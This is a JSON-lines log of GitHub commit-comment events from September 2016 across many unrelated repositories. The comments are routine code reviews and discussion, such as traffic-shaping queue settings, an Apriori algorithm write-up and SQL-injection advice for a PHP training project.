{"id":"4615796170","type":"CommitCommentEvent","actor":{"login":"dtaht"},"repo":{"name":"kdarbyshirebryant/sch_cake"},"payload":{"comment":{"id":19167598,"position":null,"line":null,"path":null,"commit_id":"fd68acda8c4ca9a9d73ae15d1b01727456613489","created_at":"2016-09-26T05:12:26Z","updated_at":"2016-09-26T05:12:26Z","body":"I have to admit my end-state was:\r\n\r\ntc qdisc add dev eth0 ingress cake bandwidth 100mbit\r\n\r\n"}},"created_at":"2016-09-26T05:12:26Z"}
{"id":"4615798278","type":"CommitCommentEvent","actor":{"login":"Daniel15"},"repo":{"name":"babel/babel"},"payload":{"comment":{"id":19167602,"position":null,"line":null,"path":null,"commit_id":"bae59470da406811773aaae5e1c8ce578be50597","created_at":"2016-09-26T05:13:31Z","updated_at":"2016-09-26T05:13:31Z","body":"Thanks for the explanation! I was genuinely curious :)\n\nSent from my phone.\n\nOn Sep 25, 2016 9:55 PM, \"Henry Zhu\" <notifications@github.com> wrote:\n\n> Yeah maybe unnecessary, but I guess consistency for es6 imports\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/babel/babel/commit/bae59470da406811773aaae5e1c8ce578be50597#commitcomment-19167517>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AAFnHcxR4eQ7JVuKegRmp_HaYarYVpwYks5qt1AngaJpZM4KGIjT>\n> .\n>\n"}},"created_at":"2016-09-26T05:13:31Z"}
{"id":"4615799480","type":"CommitCommentEvent","actor":{"login":"nanosoldier"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":19167605,"position":null,"line":null,"path":null,"commit_id":"a853c81f60d44ce107e7066c39105d963311dcef","created_at":"2016-09-26T05:14:10Z","updated_at":"2016-09-26T05:14:10Z","body":"[Your benchmark job](https://github.com/JuliaLang/julia/commit/a853c81f60d44ce107e7066c39105d963311dcef#commitcomment-19167287) has completed - possible performance regressions were detected. A full report can be found [here](https://github.com/JuliaCI/BaseBenchmarkReports/blob/96799efe698ea2989c2caa481300613e0ebd5070/daily_2016_9_26/report.md). cc @jrevels"}},"created_at":"2016-09-26T05:14:10Z"}
{"id":"4615799831","type":"CommitCommentEvent","actor":{"login":"sbahn123"},"repo":{"name":"ElementalKiss/Django"},"payload":{"comment":{"id":19167606,"position":null,"line":null,"path":null,"commit_id":"b48638371685104538fbaf13ad151989a1c83ab0","created_at":"2016-09-26T05:14:22Z","updated_at":"2016-09-26T05:14:22Z","body":"What is this?"}},"created_at":"2016-09-26T05:14:22Z"}
{"id":"4615801546","type":"CommitCommentEvent","actor":{"login":"phase"},"repo":{"name":"TechnicPack/TechnicSolder"},"payload":{"comment":{"id":19167610,"position":4,"line":8,"path":"README.md","commit_id":"0133f999b15ca0acef7140bec66d7bc2b6eff357","created_at":"2016-09-26T05:15:11Z","updated_at":"2016-09-26T05:15:11Z","body":"This invite expired."}},"created_at":"2016-09-26T05:15:11Z"}
{"id":"4615803760","type":"CommitCommentEvent","actor":{"login":"sabhiram"},"repo":{"name":"traetox/go-wol"},"payload":{"comment":{"id":19167612,"position":null,"line":null,"path":null,"commit_id":"efd351b723fcd317525ace58e67f2d7c81dcb541","created_at":"2016-09-26T05:16:19Z","updated_at":"2016-09-26T05:16:19Z","body":"Oh boy - this type of stuff will be nice to submit a patch / PR for :)"}},"created_at":"2016-09-26T05:16:19Z"}
{"id":"4615807495","type":"CommitCommentEvent","actor":{"login":"epureum"},"repo":{"name":"obscenesensi/STORAGE-project"},"payload":{"comment":{"id":19167623,"position":null,"line":null,"path":null,"commit_id":"2f14fcb94a2c97f615c69081af311d7434680ee5","created_at":"2016-09-26T05:18:15Z","updated_at":"2016-09-26T05:18:15Z","body":"stack 연습하면서 기초 올린거"}},"created_at":"2016-09-26T05:18:15Z"}
{"id":"4615812075","type":"CommitCommentEvent","actor":{"login":"Yoric"},"repo":{"name":"Yoric/yoric.github.io"},"payload":{"comment":{"id":19167635,"position":null,"line":null,"path":null,"commit_id":"f3a2f7042db103f255d606144f311c52824da41d","created_at":"2016-09-26T05:20:40Z","updated_at":"2016-09-26T05:20:40Z","body":"WTF. I didn't delete it, I don't know what happened."}},"created_at":"2016-09-26T05:20:40Z"}
{"id":"4615821623","type":"CommitCommentEvent","actor":{"login":"powellb"},"repo":{"name":"powellb/seapy"},"payload":{"comment":{"id":19167656,"position":51,"line":664,"path":"lib.py","commit_id":"b2b7cdd1fba026372d028b3349f33a239d51e0c0","created_at":"2016-09-26T05:25:27Z","updated_at":"2016-09-26T05:25:27Z","body":"I see what you are saying. The default case should be exact (e.g., tolerance = 0). There are two complications that have come up with my testing:\n\n1. if the user uses a scalar as one of the arrays (the np.diff returns an empty array)\n2. if the user doesn't provide an array of numbers (for instance, the user provides arrays of datetimes).\n\nTo alleviate 1 and part of 2, we can forgo the minimum difference test and just compare against what the user provides. Replacing the entire tolerance checking with:\n\n    # if no tolerance, compute a zero distance with the proper type\n    if tolerance is None:\n        tolerance = a[0] - a[0]\n\n\nSolves the problem. If the user specifies nothing, then the tolerance is the properly typed zero (the type passed in the arrays has to have - and <= operators).\n\nThen, if the user actually specifies tolerance, the burden is on them to do it correctly. The above works fine for float and int arrays. \n\nFor datetimes,\n\na = np.array([datetime.datetime(2014, 1, 10, 4, 30),\n       datetime.datetime(2014, 1, 10, 4, 40),\n       datetime.datetime(2014, 1, 10, 5, 30)])\nb = np.array([datetime.datetime(2014, 1, 10, 6, 0), \n       datetime.datetime(2014, 1, 10, 4, 30)])\n\nia, ib = vecfind(a, b)\n\nworks. Unfortunately,\n\nia, ib = vecfind(a, b, datetime.timedelta(10/(24*60))  # 10 min tolerance\n\ndoesn't work as ib comes back with a negative index value that is incorrect.\n\n\n\n> On Sep 25, 2016, at 5:53 PM, Eric Firing <notifications@github.com> wrote:\n> \n> I thought you wanted to allow the user to specify zero tolerance: in other words, a perfect match. For example, one grid every hour on the hour, and a second one every 10 minutes, perfectly synchronized, from which one wants only the hourly values. (This situation probably doesn't arise in practice.) If you don't, then you can leave this the way it is. I chose the default tolerance to provide essentially nearest-neighbor interpolation to the coarser of the two grids. This seems to me to be a good default--it is as permissive as it can be without using any data point more than once. Whether it should be a maximum depends on whether the grids can be irregular, and whether, if they are, it is OK to use points more than once.\n> From a pure code standpoint, if tolerance is None: is a standard idiom for handling kwargs like this; if tolerance: just looks wrong, because it is silently combining two cases: no tolerance kwarg was supplied, or it was supplied but with one particular value, 0, that is to be treated as if it were not supplied. In the latter case, the user doesn't get what the user specifies, but there is no warning.\n> \n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub, or mute the thread.\n> \n\n"}},"created_at":"2016-09-26T05:25:27Z"}
{"id":"4615828069","type":"CommitCommentEvent","actor":{"login":"SalmonGER"},"repo":{"name":"SalmonGER/SkinChanger"},"payload":{"comment":{"id":19167662,"position":null,"line":null,"path":null,"commit_id":"a08c77f1b2c8b3bfbd17efede99daf6a02fc85d8","created_at":"2016-09-26T05:28:20Z","updated_at":"2016-09-26T05:28:20Z","body":"@Aericio uhm well let's let it be like that. No one will actually realize."}},"created_at":"2016-09-26T05:28:20Z"}
{"id":"4615832506","type":"CommitCommentEvent","actor":{"login":"maloconcarne"},"repo":{"name":"RosadinTV/RosadinTV.github.io"},"payload":{"comment":{"id":19167683,"position":null,"line":null,"path":null,"commit_id":"805b30033ebe5b963f257882ab0e0b30a6eb73d3","created_at":"2016-09-26T05:30:22Z","updated_at":"2016-09-26T05:30:22Z","body":"Es el mismo desarrollador o ya cambio y es otro?"}},"created_at":"2016-09-26T05:30:22Z"}
{"id":"4615833773","type":"CommitCommentEvent","actor":{"login":"inthedark122"},"repo":{"name":"Dmytro96/Stopwatch"},"payload":{"comment":{"id":19167686,"position":3,"line":3,"path":"js/stopwatchES6.js","commit_id":"9371f9c7daaf24fcb88edf477d96102df0637ff2","created_at":"2016-09-26T05:30:55Z","updated_at":"2016-09-26T05:30:55Z","body":"import"}},"created_at":"2016-09-26T05:30:55Z"}
{"id":"4615834562","type":"CommitCommentEvent","actor":{"login":"inthedark122"},"repo":{"name":"Dmytro96/Stopwatch"},"payload":{"comment":{"id":19167689,"position":1,"line":1,"path":"js/stopwatchES6.js","commit_id":"9371f9c7daaf24fcb88edf477d96102df0637ff2","created_at":"2016-09-26T05:31:18Z","updated_at":"2016-09-26T05:31:18Z","body":"Babel автоматически это делает"}},"created_at":"2016-09-26T05:31:18Z"}
{"id":"4615836102","type":"CommitCommentEvent","actor":{"login":"inthedark122"},"repo":{"name":"Dmytro96/Stopwatch"},"payload":{"comment":{"id":19167693,"position":31,"line":31,"path":"js/stopwatchES6.js","commit_id":"9371f9c7daaf24fcb88edf477d96102df0637ff2","created_at":"2016-09-26T05:32:02Z","updated_at":"2016-09-26T05:32:02Z","body":"each в нативном или lodash"}},"created_at":"2016-09-26T05:32:02Z"}
{"id":"4615837324","type":"CommitCommentEvent","actor":{"login":"dtaht"},"repo":{"name":"kdarbyshirebryant/sch_cake"},"payload":{"comment":{"id":19167696,"position":null,"line":null,"path":null,"commit_id":"fd68acda8c4ca9a9d73ae15d1b01727456613489","created_at":"2016-09-26T05:32:35Z","updated_at":"2016-09-26T05:32:35Z","body":"(Not being intentionally hard on you. I'm delighted to see this feature land, but I can imagine users getting it wrong, the src and dst reversed, etc)"}},"created_at":"2016-09-26T05:32:35Z"}
{"id":"4615838130","type":"CommitCommentEvent","actor":{"login":"shoheis"},"repo":{"name":"hdfukuoka1985/phptrainning"},"payload":{"comment":{"id":19167698,"position":16,"line":20,"path":"issue11-2/update-delete.php","commit_id":"98653b5f4240ada32931bc738e2d440f2151dfa5","created_at":"2016-09-26T05:32:59Z","updated_at":"2016-09-26T05:32:59Z","body":"こちらもSQLインジェクション対策をしましょう！"}},"created_at":"2016-09-26T05:32:59Z"}
{"id":"4615839628","type":"CommitCommentEvent","actor":{"login":"tenselogician"},"repo":{"name":"tenselogician/SupermarketOptimization"},"payload":{"comment":{"id":19167700,"position":null,"line":null,"path":null,"commit_id":"fbe3f102a4a6eb87a2cac117694caf9237d3a2b3","created_at":"2016-09-26T05:33:43Z","updated_at":"2016-09-26T05:33:43Z","body":"Super Market Optimization Problem. \r\n\r\n1. Supermarket Optimization = Problem Statement\r\nYou’ve been hired as a market  consultant to try and help a local supermarket come up with better placement of items based on buyers preferences, and towards that goal you’d like to identify certain association rules based on existing records of buyers transactions.\r\nYou are given as input:\r\n•   A transaction database - a file consisting of a single row per transaction, with individual product's SKUs given as space–separated integers. A single transaction consisting of products with SKUs 1001, 1002 and 1003 would have a line that looks like: ‘1001 1002 1003' \r\n•   A minimal ’support level’ parameter , sigma – a positive integer \r\nTO DO: Implement, in Python or Java, an efficient algorithm for generating all frequent item sets of size 3 or more: NAMELY: groups of 3 or more items that appear together in the transactions log at least as often as the support level parameter value. \r\nEXAMPLE: For example, given a value of sigma = 2, all sets of 3 items that appear 2 or more times together in the transaction log should be returned.\r\nThe results should be returned as a file with the following format: \r\n<item set size (N)>, <co-occurrence frequency>, <item 1 id >, <item 2 id>, …. <item N id>\r\nRun the algorithm on the attached transaction log file and provide the results obtained for a value of sigma = 4\r\n\r\n2. Algorithm. \r\nThis problem is an instance of the “Association rules mining A Priori algorithm”  (Agrawal and Srikant 1994).   The goal is to find frequently purchased item sets where frequency is defined either as a fraction or as a integer, as in this case. This is called “support”. Here it is 4. In brute force fashion, to compute support for a given set, we go through every transaction and check for every set if the set at hand is   subset of the transaction.  If yes, we increment the total. Crucially, for any set of N items we can generate 2N-1 possible item sets (even if we remove sets of 2 or 1 from the power set, the number gets very large).  This combined with the need to check every transaction can cause a huge performance bottleneck.  Efficiency is a known problem for this algorithm.  However, the first optimization is the “A priori” principle itself:\r\n\r\nA priori principle:  if  frequency of itemset < min_support,  then all the  supersets of the itemset have frequency <  min_support.\r\n\r\nNote1: the apriori algorithm also involves computing confidence which is the proportion of transactions with item X, in which item Y also appears. We are not concerned with it here, nor are we concerned with mining actual association rules.\r\nNote 2:  because the algorithm is so famous and given the ‘take-home’ nature of the exercise, I did use available resources such as indicated in references below. I believe since this is a known algorithm it is expected in a take-home exam to look at existing resources.  \r\n\r\nAlgorithm in plain words:\r\nWhile  len(set_of_items) is greater than 0:\r\n             Create a list of candidate itemsets of length k \r\n             Remove any sets with frequency < min_support\r\n             With remaining itemsets that meet min_support  create itemsets of length k+1\r\n\r\nThe iterative elimination of candidates from candidate sets that do not meet support threshold is crucial to speed up the algorithm. However, even with this, the classic implementation that involves scanning all candidate sets for each transaction e.g. code snippet below involves two nested for-loops. When transaction size is small OR candidate set is small, it is slow but feasible. However, as the database of transactions grows and candidate item sets grows , the O(n*k) where n = number of transactions and k= number of candidate sets to explore becomes unmanageable.\r\nwhile(len(candidate_item_sets) != 0):\r\n   …\r\n    for candidate in candidate_sets\r\n        for transaction in transactions:\r\n            if item_set.issubset(transaction):\r\n    item_subsets+=1\r\n…\r\n3. Optimizations to reduce running time  \r\nThis bottleneck is a known problem for Apriori and various optimizations such as parallelizing or map-reduce have been proposed.  It is unmodified form e.g. with the nested loop running over candidates and inside over transactions, a python implementation of algorithm runs a whopping 7hrs (on Mac). In my implementation I propose the following optimizations:\r\n1)  Early elimination of transactions that cannot contain candidate sets of at least 3 items w/ support =4 such as transactions involving fewer than 3 items.  This reduces the number of transactions to ~22,000. Additionally, I remove from consideration any item that occurs by itself < 4 times, as any set containing this item will not meet min_support.\r\n2)  Because the space of possible candidate sets is particularly great when candidate set size is small, eliminating candidate sets of size 3 that does not meet  minsupport early on, helps reduce the search space.  This brings the running time down to about 59 min on same machine.\r\n3)  More crucially, I remove the need to loop over all transactions (~ 22,000 total transactions after transactions of < 3 items have been removed)  by creating an “inverted index” of transactions. Inverted index is a map where each item is key and the possible transactions that  contain this item is the value.  Example:  “39: [ 0, 1, 2, 3,..]” means item 39 is contained in transactions with id 0, 1, 2, 3    With this created, we can just look up for each item in a candidate set all the transactions that involved this item.  Doing this for all the items in a candidate set and finding the transactions they have in common is another way of checking if candidate set is a subset of transaction.  If every item in the candidate contains in its index some transection t, then the candidate is a subset of items purchased in t.  This optimization, while still requires a loop of the form:\r\n“for candidate_Set in candidate_sets:\r\n        for item in candidate_set: “\r\n    involves much fewer iterations, as the number of individual items in a candidate set is never as great as the number of transactions we had to loop over originally. This brings the running time down to 29 minutes.    \r\nI can imagine many more additional optimizations such as computing subsets in a more efficient manner – there may be some way to do this a la dynamic programming where we leverage created smaller sets to grow subsets.   There could be others such as using a trie map. Finally, the data set is in a sorted order, something I am not currently leveraging, but it may be relevant.\r\n\r\n4. Example.\r\nLet’s consider a very small case of the problem at hand.  Let’s assume we have a db containing ONLY these rows: 1 – 6.  Let’s further assume that our support level parameter sigma is 4 as in the original problem statement..  Given our small example, and the statement of the problem above we will recover the following items I show in green.\r\nInput data base reduced:\r\n1) 38 39 41 105 110 487 \r\n2) 38 39 41 109 110 \r\n3) 38 39 41 48 60 367 368 \r\n4) 38 39 41 48 170 189 \r\n5) 36 38 39 41 48 79 80 81\r\n6) 38 39 41 48 89 110 \r\n7) 39 48 592 593 594 595 \r\n8) 38 39 170 207 603 \r\n\r\nOutput:\r\n1. <4>, < co-occurance-frequency=4, <38> <39> <41> <48> -> the rows we see this are 3, 4, 5, 6.\r\n2. <3>, <co-occurance-frequency=6>, <38> <39> <41> ⇒ the rows we see this are 1-6 in data base.\r\n3. <3>, <co-occurance-frequency=4>, <38> <39> <48> ⇒ the rows we see this are 3, 4, 5, 6 in data base.\r\nSame for other subsets of cardinality 3 of the set of items: {<38> <39> <41> <48> } e.g.\r\n4. <3>, <co-occurance-frequency=4>, <38> <41> <48> ⇒ the rows we see this are 3, 4, 5, 6 in data base.\r\n5. <3>, <co-occurance-frequency=4>, <39> <41> <48> ⇒ the rows we see this are 3, 4, 5, 6 in data base.\r\n\r\nitemset frozenset(['39', '38', '48', '41']) Count 4 \r\nitemset frozenset(['39', '48', '41']) Count 4\r\nitemset frozenset(['39', '38', '48']) Count 4\r\nitemset frozenset(['38', '48', '41']) Count 4\r\nitemset frozenset(['39', '38', '41']) Count 6\r\n\r\n\r\n4. To run code:\r\n\r\npython AprioriForLargeData.py  -i testcase.txt -s 4\r\n\r\n5. Conclusion.\r\n\r\nThere are other optimizations I can think of that I had not done for the code.  The \r\nThis is a great problem and I really enjoyed working on it!  It is a great example of how even a famous algorithm cannot scale easily to a real life scenario and requires further optimization. Thank you!\r\n\r\nReferences:\r\nRakesh Agrawal and Ramakrishnan Srikant Fast algorithms for mining association rules in large databases. Proceedings of the 20th International Conference on Very Large Data Bases, VLDB, pages 487-499, Santiago, Chile, September 1994\r\n\r\nhttp://aimotion.blogspot.com/2013/01/machine-learning-and-data-mining.html\r\n\r\nhttp://www.kdnuggets.com/2016/04/association-rules-apriori-algorithm-tutorial.html\r\n\r\nhttps://www.manning.com/books/machine-learning-in-action (Ch 11)\r\n\r\n\r\n\r\n"}},"created_at":"2016-09-26T05:33:43Z"}
{"id":"4615840594","type":"CommitCommentEvent","actor":{"login":"bkoppelmann"},"repo":{"name":"sagark/riscv-qemu-upstream"},"payload":{"comment":{"id":19167703,"position":415,"line":415,"path":"target-riscv/cpu.h","commit_id":"32f8aae0e03be240d782f455e1dfa63da4c54751","created_at":"2016-09-26T05:34:12Z","updated_at":"2016-09-26T05:34:12Z","body":"You could use ctpop32(~val) from include/qemu/host-utils.h instead of you custom function."}},"created_at":"2016-09-26T05:34:12Z"}
{"id":"4615841388","type":"CommitCommentEvent","actor":{"login":"ncut1110"},"repo":{"name":"ncut-database-lab/mechine"},"payload":{"comment":{"id":19167705,"position":null,"line":null,"path":null,"commit_id":"374711bf194b3a00989569df2e60a3e547e3c9bc","created_at":"2016-09-26T05:34:35Z","updated_at":"2016-09-26T05:34:35Z","body":"坎坎坷坷"}},"created_at":"2016-09-26T05:34:35Z"}
{"id":"4615850390","type":"CommitCommentEvent","actor":{"login":"gnlprasanna"},"repo":{"name":"gnlprasanna/test"},"payload":{"comment":{"id":19167726,"position":null,"line":null,"path":null,"commit_id":"063d0d7aded1ce3958f7da974b49d4fa88b9f6b2","created_at":"2016-09-26T05:38:45Z","updated_at":"2016-09-26T05:38:45Z","body":"Added the primes.cpp "}},"created_at":"2016-09-26T05:38:45Z"}
{"id":"4615856516","type":"CommitCommentEvent","actor":{"login":"chq901226"},"repo":{"name":"lianshang/code-review-fe"},"payload":{"comment":{"id":19167739,"position":226,"line":226,"path":"madanni/coupon/coupon.js","commit_id":"552d837b334b32130a50db389e5ceee1a66f0f37","created_at":"2016-09-26T05:41:33Z","updated_at":"2016-09-26T05:41:33Z","body":"error没进行处理"}},"created_at":"2016-09-26T05:41:33Z"}
{"id":"4615858993","type":"CommitCommentEvent","actor":{"login":"ronakdev"},"repo":{"name":"Relic56/week4hw"},"payload":{"comment":{"id":19167741,"position":null,"line":null,"path":null,"commit_id":"80cbc893e83d6b8c58f9a8a1f02a3c2a6cd396f4","created_at":"2016-09-26T05:42:36Z","updated_at":"2016-09-26T05:42:36Z","body":"Looks good, I'll check if it works later!"}},"created_at":"2016-09-26T05:42:36Z"}
{"id":"4615863261","type":"CommitCommentEvent","actor":{"login":"MSF-Jarvis"},"repo":{"name":"ChikaraOSP/packages_apps_Launcher3"},"payload":{"comment":{"id":19167757,"position":null,"line":null,"path":null,"commit_id":"d2a61e49c2b78969eca580d71fcf1b0be831116d","created_at":"2016-09-26T05:44:27Z","updated_at":"2016-09-26T05:44:27Z","body":"Empty commit......fml"}},"created_at":"2016-09-26T05:44:27Z"}
{"id":"4615863701","type":"CommitCommentEvent","actor":{"login":"dupuy"},"repo":{"name":"botherder/targetedthreats"},"payload":{"comment":{"id":19167758,"position":null,"line":null,"path":null,"commit_id":"c0b2efa58bdd88e9d5719a4a9af31bc8aef683ad","created_at":"2016-09-26T05:44:39Z","updated_at":"2016-09-26T05:44:39Z","body":"CSV syntax is a bear, presumably GH is requiring that all comma-separated fields be fully double-quoted\r\n(and yes, # is not meaningful for CSV, so those lines are technically rows of comma-separated values).\r\n"}},"created_at":"2016-09-26T05:44:39Z"}
{"id":"4615864963","type":"CommitCommentEvent","actor":{"login":"antibland"},"repo":{"name":"smwood0906/nyTimesArticleSearch"},"payload":{"comment":{"id":19167760,"position":5,"line":12,"path":"base.html","commit_id":"d43c23d64719496ba9874f5ee198b908c03c5553","created_at":"2016-09-26T05:45:10Z","updated_at":"2016-09-26T05:45:10Z","body":"Use an `alt` attribute for accessibility."}},"created_at":"2016-09-26T05:45:10Z"}
{"id":"4615865848","type":"CommitCommentEvent","actor":{"login":"shoheis"},"repo":{"name":"hdfukuoka1985/phptrainning"},"payload":{"comment":{"id":19167763,"position":39,"line":39,"path":"issue11-2/regist.php","commit_id":"118c90c3a194e7d67bbac0ab761828654b5d5a4a","created_at":"2016-09-26T05:45:31Z","updated_at":"2016-09-26T05:45:31Z","body":"これは発展的な内容になるのですが、SQLインジェクション対策が必要となるのは、「ユーザーから変更される可能性のある」カラムのみとなります。\r\nここのSQLインジェクションのイメージを参照ください。\r\nhttps://github.com/hdfukuoka1985/phptrainning/commit/78ac38f03f7e092a9b4064e8e870f7a4cdb91e70#commitcomment-19167327\r\n\r\nよって「ユーザーから変更される可能性のない」 `$timestamp` (` date(\"Y/m/d H:i:s\"); `) は 実はプレースホルダを使わずにそのままINSERTしてもよいのです(下のようにしてもよい)。\r\n```\r\n$pdo -> prepare(\"INSERT INTO topics (name, comment,created_at) VALUES (:name, :comment, $timestamp)\");\r\n```\r\n\r\n`$timestamp` はわかりやすいかと思いますが、何が「ユーザーから変更される可能性のある」のか「ユーザーから変更される可能性のない」情報なのか迷った時には、(今の時点では)全てSQLインジェクション対策のコードで書いてよいと思います。"}},"created_at":"2016-09-26T05:45:31Z"}
{"id":"4615866629","type":"CommitCommentEvent","actor":{"login":"Aranyx63"},"repo":{"name":"Aranyx63/Test1"},"payload":{"comment":{"id":19167764,"position":184,"line":184,"path":"Dashboard/Lumino Admin Bootstrap Template/lumino/css/bootstrap-table.css","commit_id":"9d7b743459b74456e77c6ada78d6c5c33685a27d","created_at":"2016-09-26T05:45:53Z","updated_at":"2016-09-26T05:45:53Z","body":"hiihihihi"}},"created_at":"2016-09-26T05:45:53Z"}
{"id":"4615871334","type":"CommitCommentEvent","actor":{"login":"sabdo4959"},"repo":{"name":"sabdo4959/SmartShoppingSolution"},"payload":{"comment":{"id":19167769,"position":1,"line":1,"path":"SSS/.classpath","commit_id":"068db48abf279bcb5a5c5a6fc4e6904824807a5a","created_at":"2016-09-26T05:47:58Z","updated_at":"2016-09-26T05:47:58Z","body":"what?"}},"created_at":"2016-09-26T05:47:58Z"}
{"id":"4615871627","type":"CommitCommentEvent","actor":{"login":"sabdo4959"},"repo":{"name":"sabdo4959/SmartShoppingSolution"},"payload":{"comment":{"id":19167770,"position":1,"line":1,"path":"SSS/.classpath","commit_id":"068db48abf279bcb5a5c5a6fc4e6904824807a5a","created_at":"2016-09-26T05:48:06Z","updated_at":"2016-09-26T05:48:06Z","body":"what ??\r\n"}},"created_at":"2016-09-26T05:48:06Z"}
{"id":"4615872689","type":"CommitCommentEvent","actor":{"login":"Aaboobacker"},"repo":{"name":"Aaboobacker/is117f16"},"payload":{"comment":{"id":19167772,"position":null,"line":null,"path":null,"commit_id":"dcbd696dc13ded1badda489d0fe4db26731d1d8a","created_at":"2016-09-26T05:48:33Z","updated_at":"2016-09-26T05:48:33Z","body":"Upadtes with 10 HTML tags.."}},"created_at":"2016-09-26T05:48:33Z"}
{"id":"4615875198","type":"CommitCommentEvent","actor":{"login":"kdarbyshirebryant"},"repo":{"name":"kdarbyshirebryant/sch_cake"},"payload":{"comment":{"id":19167774,"position":null,"line":null,"path":null,"commit_id":"fd68acda8c4ca9a9d73ae15d1b01727456613489","created_at":"2016-09-26T05:49:39Z","updated_at":"2016-09-26T05:49:39Z","body":"Ha ha - I'm delighted to see it even vaguely work :-)  As for getting it wrong... Sebastian has some experience of dealing with this, especially when swapping lan/wan direction. Being able to de-nat on ingress/egress should make this less error prone.  At some point a test with triple isolation would be good...I've a fundamental distrust of it 'cos I don't understand it :-)"}},"created_at":"2016-09-26T05:49:39Z"}
{"id":"4615875295","type":"CommitCommentEvent","actor":{"login":"hdfukuoka1985"},"repo":{"name":"hdfukuoka1985/phptrainning"},"payload":{"comment":{"id":19167775,"position":1,"line":25,"path":"issue11-2/update-edit.php","commit_id":"78ac38f03f7e092a9b4064e8e870f7a4cdb91e70","created_at":"2016-09-26T05:49:41Z","updated_at":"2016-09-26T05:49:41Z","body":"こちら、ご指摘ありがとうございます。\r\nそうすると、idも下記のような形にすれば宜しいでしょうか？\r\n$stmt = $pdo -> prepare(\"UPDATE topics SET name=:nameafter WHERE id=:id\");"}},"created_at":"2016-09-26T05:49:41Z"}
{"id":"4615876565","type":"CommitCommentEvent","actor":{"login":"shoheis"},"repo":{"name":"hdfukuoka1985/phptrainning"},"payload":{"comment":{"id":19167779,"position":1,"line":25,"path":"issue11-2/update-edit.php","commit_id":"78ac38f03f7e092a9b4064e8e870f7a4cdb91e70","created_at":"2016-09-26T05:50:15Z","updated_at":"2016-09-26T05:50:15Z","body":"そうです！"}},"created_at":"2016-09-26T05:50:15Z"}
{"id":"4615876753","type":"CommitCommentEvent","actor":{"login":"yaycmyk"},"repo":{"name":"sapegin/react-styleguidist"},"payload":{"comment":{"id":19167780,"position":6,"line":6,"path":"src/utils/markdown-to-jsx.js","commit_id":"f7401bcd4c18eabe643d005aa6421319e69016cd","created_at":"2016-09-26T05:50:19Z","updated_at":"2016-09-26T05:50:19Z","body":"I'll add this to my module as well :) hadn't considered overrides that don't tamper with the component and only provide some additional props :+1:"}},"created_at":"2016-09-26T05:50:19Z"}
{"id":"4615877515","type":"CommitCommentEvent","actor":{"login":"amasses"},"repo":{"name":"fatzebra/FatZebra-WooCommerce"},"payload":{"comment":{"id":19167782,"position":null,"line":null,"path":null,"commit_id":"8c2b8f6dcf3b443faee00db214cd4a5ce37dbfd4","created_at":"2016-09-26T05:50:39Z","updated_at":"2016-09-26T05:50:39Z","body":"Hi Chris,\n\nI apologise for this - I had accidentally left our logging calls in while working through an issue in a recent update.\n\nAn update has been pushed (1.5.11) which removes these and fixed the other issues you have discovered.\n\nPlease let me know if you encounter any further issues.\n\nThanks,\nMatthew\n\n> On 26 Sep 2016, at 1:39 PM, Chris Atomix <notifications@github.com> wrote:\n> \n> Are all these error_log() calls needed here? We use BugSnag to capture any PHP errors on Production, will this record all payment attempts to the error log?\n> Most plugins only write to the error_log when something has failed, or if WooCommerce debug mode is enabled.\n> \n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub <https://github.com/fatzebra/FatZebra-WooCommerce/commit/8c2b8f6dcf3b443faee00db214cd4a5ce37dbfd4#commitcomment-19167195>, or mute the thread <https://github.com/notifications/unsubscribe-auth/AAGJGJo065T6wc40iXAGiv1Lu05pTd90ks5qtz6MgaJpZM4KGHNi>.\n> \n\n"}},"created_at":"2016-09-26T05:50:39Z"}
{"id":"4615878716","type":"CommitCommentEvent","actor":{"login":"antibland"},"repo":{"name":"smwood0906/nyTimesArticleSearch"},"payload":{"comment":{"id":19167790,"position":14,"line":21,"path":"base.html","commit_id":"d43c23d64719496ba9874f5ee198b908c03c5553","created_at":"2016-09-26T05:51:13Z","updated_at":"2016-09-26T05:51:13Z","body":"Another accessibility thing (for users accessing the your page via screen reader). If you use a form `input`, you should attach it to a label.\r\n\r\n`<label for=\"search-key\">Label Text</label>\r\n  <input type=\"text\" placeholder=\"Keyword\" id=\"search-key\">`\r\n\r\nIf you don't want to visually show a label, use the `aria-label` attribute on the input.\r\n\r\n`<input type=\"text\" placeholder=\"Keyword\" id=\"search-key\" aria-label=\"search key\">`"}},"created_at":"2016-09-26T05:51:13Z"}
{"id":"4615879405","type":"CommitCommentEvent","actor":{"login":"benjycui"},"repo":{"name":"ant-design/ant-design"},"payload":{"comment":{"id":19167792,"position":null,"line":null,"path":null,"commit_id":"4663995f69eea14ea001c3c4161da059a0abec78","created_at":"2016-09-26T05:51:33Z","updated_at":"2016-09-26T05:51:33Z","body":"`targetKeys` 是 `string[]`，filter 之后还是要 map。"}},"created_at":"2016-09-26T05:51:33Z"}
{"id":"4615879527","type":"CommitCommentEvent","actor":{"login":"hdfukuoka1985"},"repo":{"name":"hdfukuoka1985/phptrainning"},"payload":{"comment":{"id":19167793,"position":1,"line":25,"path":"issue11-2/update-edit.php","commit_id":"78ac38f03f7e092a9b4064e8e870f7a4cdb91e70","created_at":"2016-09-26T05:51:36Z","updated_at":"2016-09-26T05:51:36Z","body":"ありがとうございます！"}},"created_at":"2016-09-26T05:51:36Z"}
{"id":"4615881924","type":"CommitCommentEvent","actor":{"login":"benjycui"},"repo":{"name":"ant-design/ant-design"},"payload":{"comment":{"id":19167799,"position":null,"line":null,"path":null,"commit_id":"4663995f69eea14ea001c3c4161da059a0abec78","created_at":"2016-09-26T05:52:32Z","updated_at":"2016-09-26T05:52:32Z","body":"然后 `targetKeys` 中的值在 `dataSource` 里面不一定有对应的项。"}},"created_at":"2016-09-26T05:52:32Z"}
